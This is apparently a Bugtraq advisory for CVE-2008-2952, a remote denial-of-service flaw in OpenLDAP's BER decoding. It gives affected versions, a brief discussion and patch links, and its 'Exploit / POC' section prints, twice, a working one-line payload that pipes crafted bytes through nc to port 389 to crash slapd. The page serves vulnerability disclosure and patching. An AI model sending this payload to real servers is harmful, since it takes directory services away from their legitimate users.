OpenLDAP BER Decoding Remote Denial of Service Vulnerability
BID:30013
Info
OpenLDAP BER Decoding Remote Denial of Service Vulnerability
| Bugtraq ID: | 30013 |
| Class: | Design Error |
| CVE: |
CVE-2008-2952 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 30 2008 12:00AM |
| Updated: | May 07 2015 05:08PM |
| Credit: | Cameron Hotchkies |
| Vulnerable: |
Ubuntu Ubuntu Linux 8.04 LTS sparc Ubuntu Ubuntu Linux 8.04 LTS powerpc Ubuntu Ubuntu Linux 8.04 LTS lpia Ubuntu Ubuntu Linux 8.04 LTS i386 Ubuntu Ubuntu Linux 8.04 LTS amd64 Ubuntu Ubuntu Linux 7.10 sparc Ubuntu Ubuntu Linux 7.10 powerpc Ubuntu Ubuntu Linux 7.10 lpia Ubuntu Ubuntu Linux 7.10 i386 Ubuntu Ubuntu Linux 7.10 amd64 Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu Linux 7.04 powerpc Ubuntu Ubuntu Linux 7.04 i386 Ubuntu Ubuntu Linux 7.04 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubuntu Linux 6.06 LTS powerpc Ubuntu Ubuntu Linux 6.06 LTS i386 Ubuntu Ubuntu Linux 6.06 LTS amd64 Turbolinux Turbolinux Server 10.0 x86 Turbolinux Turbolinux Server 11 x64 Turbolinux Turbolinux Server 11 Turbolinux Turbolinux Server 10.0.0 x64 Turbolinux Appliance Server 3.0 x64 Turbolinux Appliance Server 3.0 Turbolinux Appliance Server 2.0 SuSE SUSE Linux Enterprise Server 8 SuSE SUSE Linux Enterprise Server 10 SP2 SuSE SUSE Linux Enterprise Server 10 SP1 SuSE SUSE Linux Enterprise SDK 10 SP1 SuSE Suse Linux Enterprise Desktop 10 SP2 SuSE Suse Linux Enterprise Desktop 10 SP1 SuSE SUSE Linux Enterprise 10 SP2 DEBUGINFO S.u.S.E. openSUSE 11.0 S.u.S.E. openSUSE 10.3 S.u.S.E. openSUSE 10.2 S.u.S.E. Open-Enterprise-Server 0 S.u.S.E. Novell Linux POS 9 S.u.S.E. Novell Linux Desktop 9.0 rPath rPath Linux 2 rPath Appliance Platform Linux Service 2 Redhat Enterprise Linux WS 4 Redhat Enterprise Linux ES 4 Redhat Enterprise Linux Desktop Workstation 5 client Redhat Enterprise Linux Desktop 5 client Redhat Enterprise Linux AS 4 Redhat Enterprise Linux 5 Server Redhat Desktop 4.0 Pardus Linux 2008 0 Pardus Linux 2007 0 OpenLDAP OpenLDAP 2.3.41 OpenLDAP OpenLDAP 2.3.40 OpenLDAP OpenLDAP 2.3.39 OpenLDAP OpenLDAP 2.3.27 OpenLDAP OpenLDAP 2.3.25 OpenLDAP OpenLDAP 2.3.6 OpenLDAP OpenLDAP 2.2.29 OpenLDAP OpenLDAP 2.2.26 OpenLDAP OpenLDAP 2.2.15 OpenLDAP OpenLDAP 2.2.6 OpenLDAP OpenLDAP 2.1.30 OpenLDAP OpenLDAP 2.1.25 OpenLDAP OpenLDAP 2.1.22 OpenLDAP OpenLDAP 2.1.19 OpenLDAP OpenLDAP 2.1.18 OpenLDAP OpenLDAP 2.1.4 OpenLDAP OpenLDAP 2.3.28-E1.0.0 OpenLDAP OpenLDAP 2.3.28-20061022 OpenLDAP OpenLDAP 2.3.28-2.20061022 OpenLDAP OpenLDAP 2.3.27-2.20061018 Mandriva Linux Mandrake 2008.1 x86_64 Mandriva Linux Mandrake 2008.1 Mandriva Linux Mandrake 2008.0 x86_64 Mandriva Linux Mandrake 2008.0 Mandriva Linux Mandrake 2007.1 x86_64 Mandriva Linux Mandrake 2007.1 MandrakeSoft Multi Network Firewall 2.0 MandrakeSoft Corporate Server 4.0 x86_64 MandrakeSoft Corporate Server 3.0 x86_64 MandrakeSoft Corporate Server 3.0 MandrakeSoft Corporate Server 4.0 Gentoo Linux Debian Linux 4.0 sparc Debian Linux 4.0 s/390 Debian Linux 4.0 powerpc Debian Linux 4.0 mipsel Debian Linux 4.0 mips Debian Linux 4.0 m68k Debian Linux 4.0 ia-64 Debian Linux 4.0 ia-32 Debian Linux 4.0 hppa Debian Linux 4.0 arm Debian Linux 4.0 amd64 Debian Linux 4.0 alpha Debian Linux 4.0 Apple Mac OS X Server 10.5.4 Apple Mac OS X Server 10.5.3 Apple Mac OS X Server 10.5.2 Apple Mac OS X Server 10.5.1 Apple Mac OS X Server 10.4.11 Apple Mac OS X Server 10.4.10 Apple Mac OS X Server 10.4.9 Apple Mac OS X Server 10.4.8 Apple Mac OS X Server 10.4.7 Apple Mac OS X Server 10.4.6 Apple Mac OS X Server 10.4.5 Apple Mac OS X Server 10.4.4 Apple Mac OS X Server 10.4.3 Apple Mac OS X Server 10.4.2 Apple Mac OS X Server 10.4.1 Apple Mac OS X Server 10.4 Apple Mac OS X Server 10.5 Apple Mac OS X 10.5.4 Apple Mac OS X 10.5.3 Apple Mac OS X 10.5.2 Apple Mac OS X 10.5.1 Apple Mac OS X 10.4.11 Apple Mac OS X 10.4.10 Apple Mac OS X 10.4.9 Apple Mac OS X 10.4.8 Apple Mac OS X 10.4.7 Apple Mac OS X 10.4.6 Apple Mac OS X 10.4.5 Apple Mac OS X 10.4.4 Apple Mac OS X 10.4.3 Apple Mac OS X 10.4.2 Apple Mac OS X 10.4.1 Apple Mac OS X 10.4 Apple Mac OS X 10.5 |
| Not Vulnerable: | |
Discussion
OpenLDAP BER Decoding Remote Denial of Service Vulnerability
OpenLDAP is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to deny service to legitimate users by crashing affected servers.
OpenLDAP 2.3.41 is vulnerable to this issue; earlier versions back to approximately 2.1.18 as well as newer versions may also be affected.
OpenLDAP is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to deny service to legitimate users by crashing affected servers.
OpenLDAP 2.3.41 is vulnerable to this issue; earlier versions back to approximately 2.1.18 as well as newer versions may also be affected.
Exploit / POC
OpenLDAP BER Decoding Remote Denial of Service Vulnerability
Attackers use readily available network utilities to exploit this vulnerability. The following commands demonstrate this issue:
slapd -h ldap:// -d511 &
perl -e 'print "\xff\xff\xff\x00\x84\x41\x42\x43\x44"' | nc localhost 389
Attackers use readily available network utilities to exploit this vulnerability. The following commands demonstrate this issue:
slapd -h ldap:// -d511 &
perl -e 'print "\xff\xff\xff\x00\x84\x41\x42\x43\x44"' | nc localhost 389
Solution / Fix
OpenLDAP BER Decoding Remote Denial of Service Vulnerability
Solution:
The vendor has released fixes. Please see the references for more information.
OpenLDAP OpenLDAP 2.3.27-2.20061018
Debian Linux 4.0 amd64
Debian Linux 4.0 ia-32
Debian Linux 4.0 mips
Debian Linux 4.0 arm
Debian Linux 4.0 powerpc
Debian Linux 4.0 sparc
OpenLDAP OpenLDAP 2.3.28-20061022
OpenLDAP OpenLDAP 2.3.28-2.20061022
Apple Mac OS X 10.4.11
Apple Mac OS X Server 10.4.11
Apple Mac OS X 10.5.4
OpenLDAP OpenLDAP 2.1.18
OpenLDAP OpenLDAP 2.1.19
OpenLDAP OpenLDAP 2.1.22
OpenLDAP OpenLDAP 2.1.4
OpenLDAP OpenLDAP 2.2.15
OpenLDAP OpenLDAP 2.2.26
OpenLDAP OpenLDAP 2.3.25
OpenLDAP OpenLDAP 2.3.39
OpenLDAP OpenLDAP 2.3.41
OpenLDAP OpenLDAP 2.3.6
Solution:
The vendor has released fixes. Please see the references for more information.
OpenLDAP OpenLDAP 2.3.27-2.20061018
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
Debian Linux 4.0 amd64
-
Debian ldap-utils_2.3.30-5+etch2_amd64.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_ 2.3.30-5+etch2_amd64.deb -
Debian libldap-2.3-0_2.3.30-5+etch2_amd64.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3 -0_2.3.30-5+etch2_amd64.deb -
Debian slapd_2.3.30-5+etch2_amd64.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.3 0-5+etch2_amd64.deb
Debian Linux 4.0 ia-32
-
Debian ldap-utils_2.3.30-5+etch2_i386.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_ 2.3.30-5+etch2_i386.deb -
Debian libldap-2.3-0_2.3.30-5+etch2_i386.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3 -0_2.3.30-5+etch2_i386.deb -
Debian slapd_2.3.30-5+etch2_i386.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.3 0-5+etch2_i386.deb
Debian Linux 4.0 mips
-
Debian ldap-utils_2.3.30-5+etch2_mips.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_ 2.3.30-5+etch2_mips.deb -
Debian libldap-2.3-0_2.3.30-5+etch2_mips.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3 -0_2.3.30-5+etch2_mips.deb -
Debian slapd_2.3.30-5+etch2_mips.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.3 0-5+etch2_mips.deb
Debian Linux 4.0 arm
-
Debian ldap-utils_2.3.30-5+etch2_arm.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_ 2.3.30-5+etch2_arm.deb -
Debian libldap-2.3-0_2.3.30-5+etch2_arm.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3 -0_2.3.30-5+etch2_arm.deb -
Debian slapd_2.3.30-5+etch2_arm.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.3 0-5+etch2_arm.deb
Debian Linux 4.0 powerpc
-
Debian ldap-utils_2.3.30-5+etch2_powerpc.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_ 2.3.30-5+etch2_powerpc.deb -
Debian libldap-2.3-0_2.3.30-5+etch2_powerpc.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3 -0_2.3.30-5+etch2_powerpc.deb -
Debian slapd_2.3.30-5+etch2_powerpc.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.3 0-5+etch2_powerpc.deb
Debian Linux 4.0 sparc
-
Debian ldap-utils_2.3.30-5+etch2_sparc.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_ 2.3.30-5+etch2_sparc.deb -
Debian libldap-2.3-0_2.3.30-5+etch2_sparc.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3 -0_2.3.30-5+etch2_sparc.deb -
Debian slapd_2.3.30-5+etch2_sparc.deb
http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.3 0-5+etch2_sparc.deb
OpenLDAP OpenLDAP 2.3.28-20061022
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
OpenLDAP OpenLDAP 2.3.28-2.20061022
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
Apple Mac OS X 10.4.11
-
Apple SecUpd2008-005Intel.dmg
For Mac OS X v10.4.11 (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=20387&cat= 1&platform=osx&method=sa/SecUpd2008-005Intel.dmg -
Apple SecUpd2008-005PPC.dmg
For Mac OS X v10.4.11 (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=20386&cat= 1&platform=osx&method=sa/SecUpd2008-005PPC.dmg
Apple Mac OS X Server 10.4.11
-
Apple SecUpdSrvr2008-005PPC.dmg
For Mac OS X Server v10.4.11 (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=20384&cat= 1&platform=osx&method=sa/SecUpdSrvr2008-005PPC.dmg -
Apple SecUpdSrvr2008-005Univ.dmg
For Mac OS X Server v10.4.11 (Universal)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=20385&cat= 1&platform=osx&method=sa/SecUpdSrvr2008-005Univ.dmg
Apple Mac OS X 10.5.4
-
Apple SecUpd2008-005.dmg
For Mac OS X v10.5.4 and Mac OS X Server 10.5.4
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=20388&cat= 1&platform=osx&method=sa/SecUpd2008-005.dmg
OpenLDAP OpenLDAP 2.1.18
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
OpenLDAP OpenLDAP 2.1.19
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
OpenLDAP OpenLDAP 2.1.22
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
OpenLDAP OpenLDAP 2.1.4
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
OpenLDAP OpenLDAP 2.2.15
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
OpenLDAP OpenLDAP 2.2.26
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
OpenLDAP OpenLDAP 2.3.25
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
OpenLDAP OpenLDAP 2.3.39
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
OpenLDAP OpenLDAP 2.3.41
-
OpenLDAP io.c patch 1.121
http://www.openldap.org/devel/cvsweb.cgi/libraries/liblber/io.c.diff?r 1=1.120&r2=1.121&hideattic=1&sortbydate=0
OpenLDAP OpenLDAP 2.3.6
References
OpenLDAP BER Decoding Remote Denial of Service Vulnerability
References:
References: